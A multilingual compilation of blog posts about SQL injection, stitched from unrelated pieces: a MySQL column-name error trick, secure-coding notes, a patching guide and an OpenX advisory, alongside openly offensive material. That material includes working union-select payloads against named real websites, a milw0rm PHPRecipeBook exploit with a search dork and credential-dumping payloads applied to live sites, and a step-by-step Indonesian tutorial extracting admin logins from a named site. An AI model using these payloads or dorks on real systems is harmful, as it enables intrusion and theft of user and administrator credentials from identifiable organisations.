Yesterday Paic posted a new comment about another idea for retrieving column names under MySQL. He found a clever way to get column names through MySQL error messages based on a trick I posted on my first article about MySQL table and column names. Here I used the modular operation ‘1′%’0′ in an injection after a WHERE clause, to provoke a MySQL error containing the column name used in the WHERE clause. But for now I couldnt expand this to other columns not used in the WHERE clause. Paic found a cool way with “row subqueries”. He explains the scenario pretty well, so I will just quote his comment:

I’ve recently found an interesting way of retrieving more column’s name when information_schema table is not accessible. It assume you’ve already found some table’s name.
It is using the 1%0 trick and MySQL subqueries.

I was playing around with sql subqueries when I’ve found something very interesting: “Row Subqueries”

You’d better read this in order to understand what’s next:

http://dev.mysql.com/doc/refman/5.0/en/row-subqueries.html

The hint is “The row constructor and the row returned by the subquery must contain the same number of values.”

Ok, imagine you have the table USER_TABLE. You don’t have any other informations than the table’s name.
The sql query is expecting only one row as result.

Here is our input:
‘ AND (SELECT * FROM USER_TABLE) = (1)– -

MySQL answer:
“Operand should contain 7 column(s)”

MySQL told us that the table USER_TABLE has 7 columns! That’s great!

Now we can use the UNION and 1%0 to retrieve some column’s name:

The following query shouldn’t give you any error:
‘ AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1,2,3,4,5,6,7 LIMIT 1)– -

Now let’s try with the first colum, simply add %0 to the first column in the UNION:
‘ AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1%0,2,3,4,5,6,7 LIMIT 1)– -

MySQL answer:
“Column ‘usr_u_id’ cannot be null”

We’ve got the first column name: “usr_u_id”

Then we proceed with the other columns…

Example with the 4th column:
‘ AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1,2,3,4%0,5,6,7 LIMIT 1)– -

if MySQL doesn’t reply with an error message, this is just because the column can be empty and you won’t be able to get it’s name!

So remember: this does only work if the column types have the parameter “NOT NULL” and if you know the table name. Additionally, this behavior has been fixed in MySQL 5.1.
Obviously it was a bug because the error message should only appear if you try to insert “nothing” in a column marked with “NOT NULL” instead of selecting. Btw other mathematical operations like “1/0″ or just “null” does not work, at least I couldn’t find any other. For ‘1′%’0′ you can also use mod(‘1′,’0′).

Anyway, another possibility you have when you cant access information_schema or procedure analyse(). Nice

update:
you can find some more information here.

Escribí un pequeño repaso de como evitar ataques web SQL y JavaScript en ASP. Este lenguaje de programación ya tiene varios años y cuando salió no eran tan conocidos estos ataques de inyección de código, entonces en general por defecto las aplicaciones web ASP son vulnerables. En ASP .Net ya hay más funciones y conciencia de estos ataques, tal vez escriba otro artículo sobre ASP .Net si alguien lo pide.

Artículo

Microsoft has developed a new security offering called HELLOSECUREWORLD.COM. It is a program to engage developers in a fun and exciting way to build knowledge around security in application development. In addition, developers can share information about secure coding for today’s internet-based computing environment. The program features an array of online and offline customer activities ranging from MSDN events, to security virtual labs, to video presentations on a new website.

Includes:

* XSS (Cross Site Scripting)
* SQLi (SQL Injection)
* Canonicalization Attack
* CSRF (Cross Site Request Forgery)
* Integer Overflow/Underflow
* Etc…

To access the labs go to: HelloSecureWorld

possible sql injection on this chinese site:

http://www.30196.com/songs.php?id=146%27

visit this site

Wokeyyy,

pertama-tama alias the first…

I’ll terangin ke loe ttg pengertian SQL injection dulu,,(ibarat bayi lahir gag mungkin langsung jalan khan??bagi newbie2=>termasuk gw,, psen gw cuma satu,, di dunia ni gag da yg instan,, smuanya btuh proses,, so baca dulu pengertian dasarnya ttg SQL injection yg bkal g jelasin stelah kalimat ini).

SQL injction (Injeksi SQL) adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.

Gimana?? dah dapet gambaran lom??

Masih gag jelas yeh??Sorry, thu td CoPas dr wiki,,^_^

Gni neh intinye…

SQLi thu teknik nyelipin script query SQL dengan memanfaatkan celah keamanan pada database yg di pakai suatu site dan kelemahan(vurln) pada suatu site,celah ni bisa ada thu di sebabkan oleh si pembuat site yang kurang teliti noh ngefilter inputan2 pada form maupun url sitenya,,

okey, cuma thu deh yang bs gw jelasin about SQLi,,

next>> Gw kan jelasin langkah2 SQLi yang sumbernya berdasarkan pengalaman gw,,

Tp gw jelasinnya di artikel stelah niy,,

ok??!!

(Klo “OK” udahan donk baca yang ni!! Pergi sno ke next artikel yg judulnya “SQLi part 1″)

ada banyak admin di sebuah website tau kalo di site-nya ada bugs yang namanya SQLi [dibaca:SQL injection] tapi mereka tidak tau bagaimana menutup lubang tersebut. hari ini aku bakal coba menjelaskan sedikit bagaimana menutup bugs terseut.

pertama.. cari file php yang terdapat celah bug / hole SQLi misalnya hole tersebut ada pada: news_detail.php?id_news= itu berarti bug terdapat pada file news_detail.php dan string code bug pada file tersebut ada pada id_news .

Disitu ditemukan bahwa id_news ada pada line 50 untuk menambal lobang tersebut… kita tambahkan filter diatas line tersebut… yaitu line 49 untuk memfilter agar cuma angka saja yg bisa diinputkan di id_news:

if (!preg_match(“/^[0-9]+$/”, $id_news)){ echo “pesan anda“; exit; }

filter agar tidak ada nilai minus diinput id_news:

if ($id_news < 0){ echo "pesan anda“; exit; }

filter pembatasan length input pada id_news:

if (strlen($id_newst)>5){ echo “pesan anda“; exit; }

* untuk isi dari “pesan anda” bisa diganti dngn script yg laen, bisa dengan “alert” js (javascript) ataupun yg lain, terserah kreativitas anda… Thanks to: Yogyafree Community, Netheroes Community, xshadow, gblack, xymcrush, paman, indounderground, squall dan semua yang telah membantu dalam memberikan penjelasan tentang patch bug SQLi

Auditing : www.akbid-alhikmah-jpr.ac.id
Date : 09 july 2009
Target : www.akbid-alhikmah-jpr.ac.id
Method : SQL injection
Contact : launal.kirom@gmail.com

http://www.akbid-alhikmah-jpr.ac.id/artikel.php?id=-8+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables–

Kami telah mengirim email tentang bugs ini 1 minggu yang lalu tetapi tidak ada tanggapan apa-apa. Kami anggap website tersebut sudah tidak terpakai karena tidak ada admin yang mengurusnya. Jadi kita publish bugs tersebut untuk pembelajaran kita semua.

Auditing : www.pmn.or.id
Date : 09 july 2009
Target : www.pmn.or.id
Method : [** CENCORED **]
Contact : info@pmn.or.id

[** CENCORED **]

Pemilik website telah menghubungi. Website dalam pengembangan.

Auditing : www.mui.or.id
Date : 09 july 2009
Target : www.mui.or.id
Method : SQL injection
Contact : info@mui.or.id

http://www.mui.or.id/mui_in/fatwa.php?id=-33+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12+from+information_schema.tables–

Kami telah mengirim email tentang bugs ini 1 minggu yang lalu tetapi tidak ada tanggapan apa-apa. Kami anggap website tersebut sudah tidak terpakai karena tidak ada admin yang mengurusnya. Jadi kita publish bugs tersebut untuk pembelajaran kita semua.

Download PHPRecipeBook: http://phprecipebook.sourceforge.net/

spl0itz: http://www.milw0rm.com/exploits/8330

//////////////////////////////////////////////////////////////////////
////////////////////////////1923TURK – GRUP///////////////////////////
//////////////////////////////////////////////////////////////////////
*****************************************************
[!] Script : PHPRecipeBook
[!] Verison : 2.39
[!] Download : http://sourceforge.net/projects/phprecipebook/

[-] Bugs : Remote SQL injection Exploit
[-] Dork : inurl:”/index.php?m=” “PHPRecipeBook 2.39″
[-] Date : 31-03-09(19:33)
[+] Author : DarKdewiL
[+] GroupWeb : www.1923turk.biz
[-] Contact : darkdewil@1923turk.biz

[!] Note : Always use the time you have to finish your work.
Never leave it to the last minute.
Once time goes away, it never comes back

*****************************************************
//////////////////////////////////////////////////////////////////////
*****************************************************
[-- Bugs --]

(+)

/index.php?m=recipes&a=search&search=yes&course_id=[SQLEXP]

[-- SQL EXPLOIT --]

Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users–
Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users–

# milw0rm.com [2009-03-31]

Ecco due siti vulnerabili:
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&base_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (nomi utenti)

http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&base_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (password utenti)
—
http://ww.cseworks.com/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (nomi utenti)

http://ww.cseworks.com/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+security_users– (password utenti)

Site:

link

SQLi:

click here ù_ù

Apa itu PoC :

Proof of concept is a short and/or incomplete realization (or synopsis) of a certain method or idea(s) to demonstrate its feasibility, or a demonstration in principle, whose purpose is to verify that some concept or theory is probably capable of exploitation in a useful manner. A related (somewhat synonymous) term is “proof of principle”.
atau bahasa indonesianya adalah alur/skema sebuah process secara step by step..

apa itu SQLi

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

ok.. itu penjelasannya… lanjut

cari target menggunakan dork google

inurl:news.php?id=10 site:my


kenapa site:my ?? karena gw benci malingshit,,  cari target terserah kalian…

misal target gw nih :

target site:

http://www.itmaasia.com/news.php?id=10

udahnya kita test apakah target kita bisa di SQLi ato gk??
caranya cukup kasih tanda ( ‘ ) / petik satu dibelakang url jadinya

http://www.itmaasia.com/news.php?id=10'

klo keluar tulisan error sql berarti webnya bisa di SQLi.

langkah berikutnya kita cari jumlah kolom. caranya make syntak

order by (jumlah kolom)--

kita terapkan pada site target jadinya

http://www.itmaasia.com/news.php?id=10 order by 300--

kalo ada tulisan :

Unknown column '300' in 'order clause'

itu berarti kolomnya kebanyakan kita pake ilmu ngira” jumlah kolomnya brp? harus pas misal kita kira² target kita punya kolom 26 sehingga

http://www.itmaasia.com/news.php?id=10 order by 26--

error tadi gk keluar.. kita coba lagi make kolom 27

http://www.itmaasia.com/news.php?id=10 order by 27--

dan lagi error gk kluar?? kita coba lagi make kolom 28

http://www.itmaasia.com/news.php?id=10 order by 28--

ternyata error keluar.. jadi kesimpulannya.. target kita tuh pny kolom 27 buah..

setelah kita dapet semua kolom kita urutkan kolom untuk mendapatkan “NOMOR AJAIB” caranya make syntak

depan id kasih tanda ( - )/kurang union select kolom1,2, n

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

maka akan muncul “NOMOR AJAIB” itulah nomor yang kita gunakan untuk inject (oh iya, nomor ajaib ini tidak hanya di badan web, tetapi bisa di title web)

di target kita ngeluarin angka 3 & 11

selanjutnya kita cari versi databasenya.. caranya make syntak

@@Version

pada nomor ajaib

penerapan dalam target kita (gw ambil yg 11)

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,@@Version,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

muncul versi database
5.0.51b-community-nt

catatan:
database versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.

langkah selanjutnya kita cari informasi table caranya

memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--

penerapan dalam target kita

http://www.itmaasia.com0,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.tables%20where%20table_schema=database()--

nah muncul kan nama² tabel nya ada tabel admin tuh

langkah selanjutnya kita akan mengintip informasi di dalam table admin,

pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name='tb_admin'--

oopppsss… error!
table ‘admin’ harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..

caranya masuk ke web ini

http://www.swingnote.com/tools/texttohex.php

trus di kolom string tulis tb_admin kemudian convert
kemudian copy hexnya. lalu kita terapkan pada target kita

http://www.itmaasia.com/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_name=0x74625f61646d696e

keluarkan informasi dari tb_admin..
langkah selanjutnya kita cari id_admin & password caranya

group_concat(username,0x3a,password) tambahkan diakhir URL from admin

dimana 0×3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from admin adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama admin..

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin

wakakakakkak… dapet dech informasi login admin dan passwordnya..
sekarang kita akan login sebagai admin, namun user admin telah terenkripsi dengan MD5. crack password md5 klo udah login sbgi admin.. ^^

selanjutnya terserah anda..

ingat ini hanya sebagai bahan belajar… jadi gunakanlah sebaik2nya

penulis tidak menanggung resiko yang terjadi

regards

~embr10~

thx to

Allah S.W.T, Nabi Muhammad SAW, my family,

Flyff 666, mywisdom, Jambihackerlink

all crew and member jasakom.com

all crew and member  echo.or.id

all crew and memberyogyafree.net

Which means that if you are running OpenX, make sure to update to the latest version which was issued just now. The latest download can be found here.

We posted an advisory detailing some well hidden SQL injection vulnerabilities as well as XSS, the possibility of arbitrary file deletion and CRLF injection. Additionally, we made available a video (below) on your favorite video sharing site explaining how we were able to identify the flaws by making use of Acunetix Acusensor (not much skills involved there), analyze the flaws and eventually develop some code to exploit one of the blind SQL injection vulnerabilities. This exploit is not publicly available  but interested organizations can contact info@enablesecurity.com for further details.